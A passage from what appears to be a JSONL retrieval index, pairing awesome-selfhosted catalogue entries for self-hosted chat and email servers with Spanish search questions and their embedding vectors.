0.04499, 0.04027, -0.00809, 0.0112, -0.07389, 0.02199, -0.04308, 0.05792, -0.03371, 0.01528, 0.05704, 0.04165, -0.00763, -0.03878, 0.0286, 0.01896, -0.02403, 0.04003, -0.02288, -0.02577, -0.11215, 0.00751, 0.00495, 0.03654, 0.10269, -0.0041, 0.00869, -0.01827, 0.00367, 0.04928, 0.02729, 0.02008, -0.0575, -0.00049, 0.04945, 0.00591, 0.05047, -0.01956, 0.08026, 0.01555, 0.00917, 0.03213, 0.01304, 0.02757, -0.04445, 0.03087, -0.04015, -0.01059, 0.08244, 0.02539, -0.0233, -0.00385, -0.02262, -0.0469, -0.04382, 0.03824, -0.01118, -0.06537, -0.00344, -0.01263, -0.07534, 0.02419, -0.01989, -0.04305, 0.0124, 0.02668, 0.02721, -0.08987, 0.03646, 0.01088]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "cual es una alternativa libre para tener mensajes instantΓ‘neos independientes de la red?", "v": [0.05275, 0.14958, -0.02194, 0.06113, -0.02536, -0.0476, -0.15631, -0.09326, -0.05379, 0.00821, -0.02199, -0.16138, -0.01069, -0.02325, 0.11275, 0.09088, 0.0463, 0.06436, 0.1864, -0.06962, 0.02766, -0.03823, -0.15341, -0.05526, -0.00163, 0.01535, -0.03259, 0.0067, -0.00979, 0.00452, 0.03891, -0.10198, 0.07913, -0.02091, -0.09343, -0.02851, 0.12131, 0.14549, 0.00944, 0.05047, 0.08552, 0.00444, -0.03809, 0.02427, 0.06994, -0.05209, -0.04462, 0.14431, 0.01169, 0.02283, -0.02663, -0.07972, -0.05784, -0.01938, -0.01866, -0.05042, 0.2312, -0.07377, -0.09168, -0.01081, -0.0188, 0.11385, 0.00625, 0.01737, 0.08676, -0.00534, 0.01897, -0.03437, -0.07041, 0.09138, 0.06411, 0.02693, -0.01121, 0.04925, -0.0128, 0.17547, -0.17293, -0.00889, -0.06909, 0.10897, 0.07422, -0.08658, -0.00517, 0.06951, 0.01159, -0.1617, 0.01561, -0.11454, -0.00115, 0.00947, 0.10447, -0.03675, 0.05461, 0.1214, 0.01537, -0.04591, -0.02774, 0.0358, 0.01825, 0.11686, 0.03747, 0.01233, -0.11425, 0.00593, 0.03706, -0.04988, 0.00871, -0.00669, 0.03433, 0.06387, 0.02432, -0.05156, 0.07418, 0.00451, 0.05502, -0.05331, -0.04494, 0.01044, 0.0337, 0.04977, -0.06199, 0.00712, 0.03552, -0.02056, 0.01558, -0.00302, -0.01036, -0.04319, -0.04518, 0.07886, 0.01747, -0.04534, -0.08933, -0.15065, -0.09501, 0.03389, 0.00766, -0.02476, -0.04135, -0.03229, -0.0413, 0.02064, -0.05734, -0.0889, 0.0149, 0.04427, -0.08097, -0.11391, -0.0054, 0.002, 0.00768, 0.00133, -0.08109, 0.04042, -0.01687, -0.01971, -0.05162, -0.01807, -0.04335, 0.08856, 0.00363, -0.05674, 0.00217, 0.01602, 0.01916, -0.01511, 0.00023, 0.07254, -0.03393, 0.0209, -0.01784, 0.0438, 0.0618, -0.08888, 0.01144, -0.06222, 0.02481, -0.06105, -0.03473, -0.09225, 0.06315, 0.04533, -0.09442, 0.00803, 0.02923, -0.04981, -0.01958, 0.00661, 0.06321, 0.08309, -0.03514, -0.01581, -0.05869, -0.01786, 0.00243, 0.03771, 0.00843, -0.10742, 0.02495, -0.00171, -0.0867, -0.03996, 0.00223, -0.04085, -0.06713, -0.02528, -0.07809, 0.04969, 0.00777, 0.06961, 0.05963, -0.01762, 0.1198, -0.00026, -0.09212, 0.01684, 0.06959, -0.04469, 0.0036, -0.02876, 0.11127, 0.0376, 0.00547, -0.02838, -0.02721, 0.10543, -0.0084, 0.06864, 0.0074, 0.05176, 0.01288, 0.02763, -0.05232, 0.01851, 0.04143, -0.0036, 0.06148, 0.02873, -0.00289, -0.05952, 0.06103, 0.03497, -0.00941, 0.02205, -0.02406, -0.02585, -0.09236, -0.00573, -0.05367, -0.00596, -0.041, 0.03196, 0.04104, -0.00279, 0.03759, -0.02871]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "que plataforma me sirve para crear una comunidad de chat segura y privada?", "v": [-0.04057, 0.09226, -0.1974, -0.11526, -0.0492, -0.25747, -0.01908, -0.0691, -0.07895, -0.1426, -0.06867, -0.0633, 0.06105, -0.02215, -0.03577, 0.01395, 0.05502, -0.06654, 0.11466, 0.03541, 0.01877, -0.00029, 0.01376, -0.11171, -0.10126, -0.10548, 0.12742, -0.077, -0.02731, 0.06471, 0.07133, 0.07361, -0.02688, 0.08874, -0.00302, -0.08762, 0.0603, -0.01899, -0.04427, 0.01567, 0.01516, 0.0021, 0.00647, 0.07485, 0.10942, 0.1085, 0.0079, -0.04878, 0.03863, 0.03617, -0.18662, -0.07787, -0.1207, 0.02897, 0.03544, -0.00148, 0.09817, -0.12616, 0.07013, -0.02957, -0.23734, -0.06976, 0.07497, -0.01251, -0.01373, -0.06977, -0.03982, 0.0546, -0.08251, 0.10208, 0.03487, -0.03538, 0.01443, 0.0388, -0.0425, -0.0097, -0.06206, 0.01306, -0.05097, 0.00946, 0.05269, 0.01579, -0.02671, 0.02706, -0.06182, -0.10231, 0.00241, -0.02172, 0.07392, 0.00158, 0.11219, 0.01305, 0.00992, -0.00952, 0.00047, -0.06618, 0.06752, 0.0214, -0.05346, -0.09377, 0.03895, -0.01851, -0.05757, 0.01217, -0.01511, -0.01316, 0.01356, -0.06073, 0.02992, -0.05137, 0.14757, 0.05076, 0.05086, -0.01024, -0.00827, 0.02063, -0.08111, 0.03397, 0.09211, 0.059, 0.0033, -0.04325, -0.00603, -0.12266, 0.04964, 0.04594, -0.09819, 0.06365, -0.01923, 0.05948, -0.07218, -0.05459, -0.0936, -0.03507, 0.01699, 0.04485, 0.01338, 0.00286, -0.00269, -0.0359, 0.09824, 0.05791, -0.03047, -0.14153, 0.06379, -0.03312, -0.02027, -0.15516, 0.04346, 0.05336, -0.03235, 0.08739, -0.04559, 0.01996, -0.12038, -0.03993, 0.02753, -0.05344, -0.03911, 0.10563, 0.0428, 0.00979, 0.02144, -0.03166, 0.0078, -0.0086, -0.02173, -0.03364, 0.05876, 0.00111, 0.03779, 0.02922, 0.12063, -0.15201, 0.08087, 0.00266, -0.05689, -0.03575, -0.03819, -0.05, -0.06626, -0.04855, -0.01827, 0.00508, -0.01475, -0.04643, 0.03049, 0.0135, 0.04, 0.08106, -0.03298, 0.04777, -0.0292, 0.02868, -0.01627, -0.0726, -0.02984, -0.05572, -0.0008, -0.05205, -0.02798, 0.03799, -0.00261, -0.01004, -0.02228, 0.0115, 0.00018, -0.01434, 0.03009, 0.01493, 0.04266, 0.02551, 0.09131, -0.00668, -0.01164, 0.01444, 0.1047, -0.03038, -0.00705, -0.01857, -0.02092, 0.03173, -0.00857, -0.00892, 0.04697, 0.0244, 0.04305, 0.01669, -0.00305, -0.01521, 0.03781, -0.02992, -0.00772, -0.05098, 0.06037, -0.04119, 0.04391, -0.01114, -0.07741, -0.0615, -0.00392, 0.03417, -0.02554, -0.0216, 0.00795, -0.04289, -0.05023, 0.03164, -0.04987, -0.078, -0.0406, 0.0006, 0.09121, -0.01866, 0.03038, 0.01153]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "con que puedo montar un sistema de mensajerΓ­a instantΓ‘nea con soporte nativo en iOS y Android?", "v": [0.13844, 0.0773, -0.09753, -0.09495, -0.03925, -0.02184, -0.14811, -0.00253, -0.11742, -0.00106, -0.04687, -0.07634, 0.05284, -0.01796, -0.03788, 0.11608, 0.05777, 0.04585, 0.0024, 0.00887, -0.01746, -0.0393, -0.16755, -0.1044, -0.0461, 0.20354, -0.09301, 0.03649, -0.09849, -0.06152, -0.04123, -0.12876, 0.11052, 0.00068, -0.17522, -0.1238, -0.01772, 0.02028, -0.09108, -0.02444, 0.05128, -0.00439, 0.05133, 0.05318, 0.02859, -0.00889, 0.0908, -0.02852, -0.04064, -0.02113, 0.01344, -0.08445, -0.05601, 0.01237, -0.12593, 0.01817, 0.27904, -0.11704, 0.02281, -0.02083, -0.07247, 0.17253, -0.0494, 0.01117, 0.05742, 0.01841, 0.02635, 0.0146, -0.13109, -0.034, 0.08875, 0.00035, 0.00466, 0.16983, -0.01509, 0.18539, -0.10234, 0.06947, -0.01742, 0.10819, 0.01893, -0.04281, 0.034, 0.06698, 0.02036, -0.06767, -0.05763, -0.01309, -0.01552, -0.06058, 0.01979, -0.01393, 0.0108, -0.00221, 0.00208, -0.1241, -0.0464, -0.0414, -0.0186, 0.06642, -0.03136, -0.07356, -0.09174, 0.07856, -0.03066, -0.09337, 0.05702, -0.05505, 0.07794, -0.00904, -0.02548, -0.03955, 0.0272, 0.06459, -0.04002, -0.07071, 0.03791, -0.04551, -0.00824, 0.01508, -0.01111, 0.0667, 0.07146, 0.00153, 0.09606, 0.03384, 0.00089, 0.07723, 0.04825, -0.01409, 0.0257, -0.09026, 0.01617, 0.02077, -0.03056, 0.06551, 0.0258, 0.05219, 0.00808, 0.0682, -0.01209, 0.02539, -0.00627, -0.08945, 0.06849, 0.05402, -0.04466, -0.10582, 0.04141, -0.00501, 0.06205, 0.07483, -0.06328, -0.04362, -0.08462, -0.07568, 0.02795, -0.06856, 0.0228, 0.00998, -0.01128, -0.05098, -0.02557, 0.05474, -0.08461, -0.06106, 0.00181, 0.0302, 0.12302, 0.01998, -0.01234, 0.04325, 0.12513, -0.02001, -0.02704, -0.00254, 0.06092, -0.01157, 0.02442, -0.05102, -0.02633, 0.05535, 0.06071, -0.02934, 0.02767, -0.00297, -0.03254, 0.02407, 0.04112, 0.03264, 0.01769, 0.07619, -0.00321, 0.05529, 0.03359, -0.02947, -0.05195, 0.0096, 0.03255, 0.06343, -0.06663, -0.01206, 0.02054, -0.01502, -0.00791, -0.01058, 0.01485, 0.05936, 0.02297, 0.02948, -0.00911, 0.02548, 0.08475, 0.03683, 0.00441, 0.0405, 0.02197, 0.03665, -0.03474, -0.01329, -0.00089, -0.00762, 0.04304, 0.03957, 0.00446, 0.03441, 0.0256, -0.00464, 0.00831, 0.01696, -0.00826, -0.0143, 0.01111, 0.00285, 0.06624, -0.00058, 0.0392, -0.0093, -0.03861, -0.05317, -0.01088, 0.04792, 0.04458, 0.0109, -0.09679, -0.04589, -0.07265, 0.01213, -0.04904, -0.079, -0.03392, 0.02459, 0.04633, -0.06485, -0.01818, -0.00544]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "cual es una alternativa libre a Zendesk o Intercom para gestionar el engagement del cliente desde WhatsApp hasta la web?", "v": [-0.137, 0.03907, -0.11691, -0.14697, -0.05343, -0.02883, -0.1033, -0.02008, -0.12806, -0.03473, -0.13496, -0.19656, -0.11496, -0.02957, 0.04226, 0.16637, 0.12512, -0.06387, 0.11044, -0.01195, 0.00302, 0.07633, -0.03813, -0.05582, -0.14488, -0.02635, -0.03941, -0.09881, -0.09512, 0.07807, 0.00772, -0.25104, -0.03131, 0.04627, 0.01825, 0.01723, 0.0952, 0.12796, 0.11649, 0.01516, -0.01364, 0.04715, -0.11331, 0.09161, 0.11963, 0.11228, -0.013, -0.01626, 0.05858, 0.00303, -0.1165, -0.00939, 0.01767, 0.03658, 0.02585, -0.00228, 0.14964, -0.12843, 0.07081, -0.05465, -0.02404, 0.11295, -0.04519, 0.10988, 0.12812, -0.05411, -0.07347, 0.09308, -0.00607, 0.14219, 0.10291, 0.03091, 0.00746, -0.02712, 0.09869, 0.0292, -0.07776, 0.05717, -0.10025, 0.00568, 0.06989, 0.0011, 0.05542, 0.00787, -0.01979, -0.01472, 0.06934, -0.04874, 0.00637, 0.01127, 0.02446, 0.0785, -0.06208, 0.04541, -0.04978, -0.13421, -0.05008, 0.01296, 0.02446, 0.00397, 0.02401, -0.00358, -0.08068, -0.04698, -0.03459, 0.02753, 0.02843, 0.02279, -0.1181, 0.01353, -0.03843, 0.04096, -0.01865, 0.07112, -0.02874, -0.03725, 0.04551, 0.00183, 0.05071, -0.07377, -0.05627, -0.01789, -0.00354, -0.03874, -0.01328, 0.10982, -0.00622, 0.12037, -0.02206, -0.0087, 0.03013, -0.0787, -0.09193, -0.03939, -0.06315, -0.01253, 0.03707, 0.00523, 0.02914, -0.02365, -0.03209, -0.0625, 0.03155, -0.02997, 0.08586, -0.04958, -0.01367, -0.07119, -0.03207, 0.05211, -0.03344, -0.00238, -0.06947, 0.06745, -0.06171, -0.01314, -0.08215, -0.01527, -0.028, 0.06451, -0.00596, -0.03108, 0.0179, 0.05869, 0.01222, -0.03397, -0.02089, -0.02763, -0.01254, -0.02264, 0.03377, 0.05551, 0.04729, -0.1207, 0.05379, -0.01618, 0.00586, -0.06635, 0.04928, -0.04743, 0.02589, 0.00342, 0.04109, 0.01699, 0.02043, 0.01259, -0.10347, 0.03067, -0.03591, 0.04569, -0.08455, 0.03213, -0.06248, -0.032, 0.04987, -0.03461, -0.05357, -0.04851, -0.02209, -0.017, -0.03724, -0.02297, 0.02934, -0.00864, -0.03543, 0.05001, 0.00964, 0.0519, 0.02104, 0.02306, 0.00622, -0.00071, 0.10033, 0.04029, -0.026, -0.02031, 0.02416, -0.01856, 0.0561, 0.03048, 0.01827, -0.00675, -0.00856, -0.02546, -0.01747, 0.04017, -0.02066, 0.0449, -0.0461, 0.0286, 0.02371, -0.04508, -0.02336, 0.02983, 0.041, -0.05089, 0.07346, -0.02262, -0.05083, -0.03278, 0.02206, 0.07141, 0.01517, 0.03684, -0.02876, -0.00232, -0.1126, 0.01537, -0.03503, -0.02858, -0.02274, -0.013, 0.02286, 0.02873, 0.05589, -0.02996]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "que herramienta me sirve para configurar un servidor de correo completo y sencillo?", "v": [-0.01685, 0.11755, -0.24296, -0.22943, -0.02276, -0.22311, -0.0604, -0.09447, 0.01544, -0.07787, -0.11637, -0.04456, 0.07311, -0.14289, 0.06826, 0.00247, 0.13417, -0.15995, 0.02856, 0.07917, 0.01248, -0.01027, -0.01294, -0.03613, -0.13867, 0.02033, 0.10454, -0.05458, -0.15294, -0.04083, 0.05263, -0.03928, 0.01677, -0.02834, -0.01028, -0.06092, 0.00264, 0.07144, -0.10786, 0.03751, 0.05188, -0.03893, -0.02532, 0.12119, 0.0019, 0.0054, 0.08526, -0.02022, 0.0412, 0.04964, -0.03508, -0.1618, -0.13742, 0.00411, -0.04544, -0.03525, 0.18889, -0.22444, 0.05478, -0.12348, -0.11573, 0.00523, 0.01177, -0.00937, 0.03511, 0.02195, -0.0535, -0.06136, -0.06811, -0.04242, -0.07508, 0.06079, 0.02293, -0.08792, 0.01494, 0.04039, 0.01921, 0.00908, 0.04475, 0.07902, 0.08763, -0.02064, -0.10003, 0.03007, -0.09867, -0.0902, 0.06929, -0.03779, 0.04749, -0.05034, 0.06135, 0.03843, -0.07765, 0.02574, 0.01413, -0.0119, 0.05647, -0.02483, -0.0295, 0.00799, 0.16601, 0.00108, -0.08923, 0.08926, -0.01453, 0.05705, 0.03779, -0.04736, -0.00317, -0.04848, 0.03445, 0.00459, -0.00974, 0.00801, -0.037, -0.04492, -0.00896, -0.02055, 0.02273, 0.00758, -0.02271, 0.0401, -0.03006, 0.05508, 0.01484, -0.02272, 0.01131, 0.02996, 0.04602, 0.0101, -0.03932, -0.09902, -0.06579, 0.01984, -0.0078, 0.00826, 0.02932, -0.11086, -0.05663, -0.06436, 0.02965, 0.05549, -0.06454, -0.09843, 0.1025, -0.00226, 0.08241, -0.0941, -0.03759, 0.02842, 0.03788, -0.07621, -0.03485, -0.00616, -0.09433, -0.02658, 0.03433, -0.01982, -0.06099, 0.02937, -0.0369, 0.00607, 0.06433, 0.03921, 0.01013, -0.05097, -0.00266, 0.0178, 0.073, 0.07592, -0.00139, 0.01751, 0.08481, -0.0465, -0.0128, -0.05379, -0.06232, 0.00881, -0.00889, 0.01052, -0.04049, -0.0042, -0.01151, -0.00252, -0.02712, -0.03372, 0.01297, -0.01455, -0.00032, 0.01446, 0.01151, 0.03818, -0.04803, -0.00737, 0.04384, 0.02363, -0.0433, -0.06815, -0.03658, -0.03404, -0.04057, -0.05962, -0.01328, -0.04849, 0.01336, 0.03406, -0.04224, 0.00531, 0.00415, 0.05628, 0.00812, -0.02644, 0.06763, -0.02611, -0.00519, -0.02437, 0.09774, -0.00554, 0.01518, -0.00223, 0.00783, 0.00156, 0.01978, 0.00314, -0.01188, 0.0502, 0.00536, -0.0292, 0.03257, -0.00646, -0.03681, 0.00803, -0.02897, -0.01292, 0.03207, -0.06474, 0.03689, -0.01885, -0.07166, -0.03955, 0.0197, 0.04436, -0.00146, -0.04817, -0.06842, -0.08541, -0.00844, -0.03141, -0.05598, -0.02914, -0.03133, -0.03517, 0.0484, -0.03918, 0.00548, -0.02477]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "con que puedo montar una soluciΓ³n de correo que funcione en cualquier espacio web?", "v": [-0.03405, 0.12175, -0.27064, -0.06385, -0.12937, -0.10403, -0.00131, -0.03805, -0.17054, -0.14212, -0.05613, -0.1065, 0.081, -0.01689, 0.1398, -0.03145, 0.0736, -0.10091, -0.02007, -0.00389, -0.08781, -0.13256, -0.08728, -0.02426, -0.02365, 0.05751, 0.05029, -0.07426, -0.1456, 0.02568, 0.09411, 0.06095, 0.0391, 0.03606, -0.00458, -0.07213, 0.02598, 0.0611, -0.0011, -0.00525, -0.00607, -0.03706, -0.06732, 0.05999, -0.11085, 0.01438, 0.07357, -0.14023, -0.03113, 0.04846, -0.03051, -0.1304, -0.06413, -0.03998, -0.05471, -0.0044, 0.204, -0.04821, 0.12059, -0.01902, -0.08446, 0.06265, 0.02725, 0.03653, 0.03895, 0.04313, -0.03481, -0.00934, -0.09082, 0.01288, -0.08239, -0.03098, -0.03058, -0.06052, 0.01668, 0.08411, -0.05722, -0.00643, -0.01926, 0.08031, 0.10877, -0.0043, -0.03984, 0.00087, -0.10983, -0.04515, 0.02533, -0.15219, -0.0386, -0.02621, 0.00955, -0.00759, 0.03533, 0.06536, -0.03997, -0.15131, 0.0175, 0.09512, 0.01969, -0.05447, 0.01931, 0.06866, -0.14114, 0.03121, 0.06216, 0.01857, 0.04248, -0.05012, 0.00846, -0.05781, 0.00968, -0.0017, -0.04333, -0.12657, -0.18604, -0.09677, -0.05666, 0.04685, -0.02767, -0.00443, -0.09307, 0.03619, 0.06378, 0.02584, 0.02682, -0.00151, 0.07592, 0.03718, -0.04779, -0.02867, -0.06028, -0.0602, -0.06185, -0.02663, 0.02998, 0.02741, -0.04275, 0.04164, -0.01496, 0.01481, 0.08526, -0.00936, -0.03711, -0.0255, -0.03002, 0.00306, -0.00362, -0.07673, -0.11153, -0.01255, 0.02293, 0.04279, 0.02033, 0.0568, -0.10583, 0.03832, 0.04806, 0.00825, 0.05132, 0.03155, -0.04798, 0.07465, 0.036, 0.06979, -0.04059, -0.03482, -0.08152, 0.01291, -0.01916, 0.04521, -0.09934, 0.07849, -0.00046, -0.065, 0.05422, 0.04231, -0.06657, -0.04038, 0.07707, -0.0278, -0.03258, 0.00155, -0.0042, 0.02662, -0.03923, -0.02765, 0.06008, -0.00957, -0.0445, 0.05274, 0.0473, -0.05125, -0.04395, -0.02552, -0.02536, -0.04679, -0.06849, -0.03061, 0.01777, -0.01542, -0.07206, -0.01122, 0.03968, 0.00458, -0.03355, -0.03557, -0.04534, 0.05938, 0.01758, 0.00637, 0.04145, -0.06643, 0.07031, -0.05627, -0.02682, 0.02551, 0.07254, -0.03624, -0.02281, 0.02584, 0.02157, 0.01139, 0.04982, -0.03605, -0.01433, 0.03115, 0.04896, 0.00922, 0.03854, 0.03568, -0.00449, 0.00747, -0.01609, -0.06291, 0.02291, 0.00046, 0.04046, -0.05202, -0.04266, -0.00821, 0.04535, 0.0869, -0.00028, 0.05325, 0.00575, -0.03776, -0.10721, 0.04232, 0.00039, -0.05464, -0.04561, 0.02678, -0.01514, -0.02119, -0.01092, 0.00387]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "cual es una alternativa libre a los servidores de correo tradicionales?", "v": [0.02421, 0.03818, -0.07695, -0.00301, -0.07369, -0.00298, 0.1438, -0.1371, -0.05349, -0.05192, -0.06294, -0.08751, 0.08274, -0.05123, 0.11803, -0.05078, 0.16877, -0.03447, 0.17384, 0.01409, -0.03038, -0.0054, -0.07222, -0.01692, -0.08224, -0.04275, 0.03475, -0.03794, -0.0386, 0.06428, 0.07718, -0.04103, 0.09027, -0.04884, 0.0149, 0.05893, 0.06705, 0.17364, -0.10761, -0.04849, 0.11729, -0.09255, -0.09764, 0.00735, -0.0701, -0.07863, -0.06983, 0.03264, -0.01304, 0.02579, -0.12245, -0.07069, -0.04129, -0.00885, 0.00731, 0.00787, 0.07354, -0.04865, -0.0591, -0.01346, -0.10898, 0.12415, 0.0654, -0.02385, 0.04803, -0.02461, -0.03406, -0.06845, -0.10791, -0.02003, 0.06116, 0.02609, -0.03005, -0.08106, -0.12101, 0.12001, -0.06624, -0.01303, -0.00233, 0.09143, 0.04964, -0.06203, 0.02018, 0.06142, -0.1146, -0.11845, 0.04332, -0.09705, -0.00772, -0.00362, 0.06879, 0.0537, 0.01023, 0.16407, -0.01167, -0.09057, 0.02655, 0.00983, -0.019, 0.13504, 0.085, 0.0827, -0.06857, 0.00277, 0.01773, 0.01172, 0.04265, 0.00899, 0.04601, 0.01279, -0.008, -0.01925, -0.01658, 0.09786, -0.02519, -0.07137, -0.04768, -0.0332, 0.02387, 0.06866, -0.05976, 0.03482, 0.0431, 0.00787, 0.02835, -0.06783, 0.05553, 0.01261, -0.03492, 0.02446, 0.0306, -0.04578, -0.06837, -0.05819, -0.09948, -0.05965, 0.14641, -0.06295, 0.00292, -0.02643, 0.01723, 0.04447, -0.00674, -0.06407, 0.09096, -0.01882, 0.09984, -0.06569, -0.07754, -0.06539, -0.11309, -0.01454, -0.03469, 0.09055, -0.07051, 0.00197, -0.0524, -0.0636, -0.10384, 0.13753, 0.04897, -0.00655, 0.03314, 0.05973, -0.05802, -0.0064, -0.02467, -0.00299, -0.04355, 